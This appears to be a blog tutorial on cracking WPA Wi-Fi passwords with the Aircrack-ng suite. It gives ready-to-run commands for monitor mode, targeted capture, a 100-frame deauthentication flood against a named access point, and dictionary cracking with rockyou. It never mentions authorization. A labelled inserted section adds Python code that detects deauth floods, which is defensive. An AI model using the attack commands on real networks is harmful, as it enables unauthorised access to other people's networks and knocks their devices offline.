Hacking Wifi Networks with Aircrack suite | The Easiest Way

Hacking wifi the easiest way

Aircrack-ng is a complete suite of tools to assess WiFi network security.

It focuses on different areas of WiFi security:

  • Monitoring: packet capture and export of data to text files for further processing by third-party tools
  • Attacking: replay attacks, deauthentication, fake access points and others via packet injection
  • Testing: checking WiFi cards and driver capabilities (capture and injection)
  • Cracking: WEP and WPA PSK (WPA 1 and 2)

Steps to Hack Wifi Networks

We are going to follow two basic steps to crack wifi passwords.

  1. Capture the four-way handshake.
  2. Crack the password from the captured handshake.

1. Capture the Handshake

What is the four-way handshake?

To join a WiFi access point you enter a pre-shared key (the WiFi password) on your phone or laptop. When the device connects, it uses that password to derive a fresh session key through a process called the four-way handshake, in which a few parameters (not covered in detail here) are exchanged. This session key is then used to encrypt communication over the WiFi link.

If you capture this handshake, you can attack it offline to reveal the WiFi password.

Put your card in Monitor Mode

By default, a WiFi card captures only the traffic addressed to your own device. Putting it in monitor mode tells the card to capture all wireless traffic it can hear.

>iwconfig  (check for an existing WiFi adapter)

>airmon-ng start wlan0  (activate monitor mode)

>iwconfig  (check the new device name, wlan0mon in this case)

Capture traffic with airodump-ng

The airodump-ng tool captures information about every wireless network in range, including each access point's BSSID.

>airodump-ng wlan0mon  (use your card's name)

Now start capturing the traffic of the intended AP (Home in this case):

> airodump-ng -c 6 --bssid C0:F6:C2:5E:8D:20 -w pass wlan0mon

Here:

-c 6 is the channel of the wireless network.
--bssid C0:F6:C2:5E:8D:20 is the access point's MAC address. This filters out extraneous traffic.
-w pass is the prefix for the output capture file (airodump-ng writes pass-01.cap, which the cracking step matches with pass*.cap).
wlan0mon is the interface name.

Deauthenticate the Wireless clients

Now you need to deauthenticate the clients connected to the AP, so that they are forced to reconnect and the handshake can be captured while airodump-ng is still running.

>  aireplay-ng -0 100 -a C0:F6:C2:5E:8D:20 wlan0mon

Here:
-0 means deauthentication.
100 is the number of deauth packets to send.
-a C0:F6:C2:5E:8D:20 is the access point's MAC address.
wlan0mon is the interface name.

Look for the "WPA handshake" notification in the main airodump-ng capture window.
Press Ctrl+C to stop the capture.
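The deauthentication step works because 802.11 management frames are unauthenticated unless the network enables Protected Management Frames (802.11w, mandatory in WPA3). From the defender's side the same burst is easy to spot: a legitimate AP sends the odd deauth frame, not dozens per second. The following added example (not code from this post or from the Aircrack-ng project) shows detection logic of that kind run over constructed frame records. The record format, the client address and the sample data are assumptions for the example; the access point MAC is the one used in the post.

```python
"""Detect deauthentication floods in a stream of 802.11 management-frame records.

Added example, not code from the original post or from the Aircrack-ng project.
The record format "<unix_time> <subtype> <src_mac> <dst_mac>" and the sample
frames are constructed; the access point MAC is the one used in the post.
"""
from collections import defaultdict, deque
from typing import Deque, Dict, Iterable, List, Set, Tuple

BROADCAST = "FF:FF:FF:FF:FF:FF"


def parse_record(line: str) -> Tuple[float, str, str, str]:
    """Split one constructed log line into (timestamp, subtype, src, dst)."""
    ts, subtype, src, dst = line.split()
    return float(ts), subtype.lower(), src.upper(), dst.upper()


def detect_deauth_floods(lines: Iterable[str], window_s: float = 10.0,
                         threshold: int = 20) -> List[Dict[str, object]]:
    """Return one alert per burst of at least `threshold` deauth/disassoc frames
    from the same source address within any `window_s`-second span.

    A sliding window (deque of timestamps) is kept per source. An alert fires
    the first time a source's window reaches the threshold and is re-armed only
    after the window drains below it, so one long flood yields one alert.
    """
    recent: Dict[str, Deque[float]] = defaultdict(deque)
    in_alarm: Set[str] = set()
    alerts: List[Dict[str, object]] = []

    for line in lines:
        if not line.strip():
            continue
        ts, subtype, src, dst = parse_record(line)
        if subtype not in ("deauth", "disassoc"):
            continue  # beacons, probes and data frames are not of interest here

        window = recent[src]
        window.append(ts)
        while window and ts - window[0] > window_s:
            window.popleft()  # age out frames older than the window

        if len(window) >= threshold:
            if src not in in_alarm:
                in_alarm.add(src)
                alerts.append({
                    "src": src,
                    "first_seen": window[0],
                    "last_seen": ts,
                    "count": len(window),
                    # a broadcast deauth knocks every client off the AP at once
                    "broadcast": dst == BROADCAST,
                })
        else:
            in_alarm.discard(src)
    return alerts


def make_sample_log() -> List[str]:
    """Constructed sample: normal traffic, one unremarkable deauth, then a burst
    of 100 broadcast deauth frames whose source is spoofed as the AP."""
    ap = "C0:F6:C2:5E:8D:20"        # BSSID from the post
    client = "AA:BB:CC:DD:EE:01"    # constructed client address
    t0 = 1700000000.0
    lines = [
        f"{t0:.3f} beacon {ap} {BROADCAST}",
        f"{t0 + 1.0:.3f} deauth {ap} {client}",   # a single deauth is normal
        f"{t0 + 5.0:.3f} beacon {ap} {BROADCAST}",
    ]
    # The flood: 100 frames spread over two seconds (the count used in the post)
    lines += [f"{t0 + 20.0 + i * 0.02:.3f} deauth {ap} {BROADCAST}"
              for i in range(100)]
    lines.append(f"{t0 + 60.0:.3f} beacon {ap} {BROADCAST}")
    return lines


if __name__ == "__main__":
    for alert in detect_deauth_floods(make_sample_log()):
        span = alert["last_seen"] - alert["first_seen"]
        print(f"deauth flood from {alert['src']}: {alert['count']} frames in "
              f"{span:.2f}s, broadcast={alert['broadcast']}")
```

The threshold and window are tuning knobs: a busy enterprise AP legitimately emits more deauth frames than a home router, so calibrate against a baseline capture before alerting. Because the source address of the flood is the AP's own BSSID, the alert cannot tell a spoofed frame from a real one; only 802.11w makes that distinction on the air.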

2. Crack the Handshake

Now we can crack the captured handshake with the following command.

>aircrack-ng -w /usr/share/wordlists/rockyou.txt -b C0:F6:C2:5E:8D:20 pass*.cap

Here:
-w /usr/share/wordlists/rockyou.txt is the dictionary file. Kali has this wordlist installed already.
-b C0:F6:C2:5E:8D:20 selects the access point whose handshake to crack.
pass*.cap is the packet file in which the captured handshake is stored.

Selecting the dictionary file for cracking the WPA password

Sometimes the password list is compressed, and we need to uncompress it first. Locate the file:

>locate rockyou

Now uncompress the file:

>gunzip /usr/share/wordlists/rockyou.txt.gz

We can check that the file is uncompressed and available with the following command.

>ls /usr/share/wordlists/

Cracking the Wifi password

Now, to crack the password, run the following command:

> aircrack-ng pass*.cap -w /usr/share/wordlists/rockyou.txt

If the password is in the dictionary, aircrack-ng reveals it. We can see that the password home1234 has been cracked successfully.
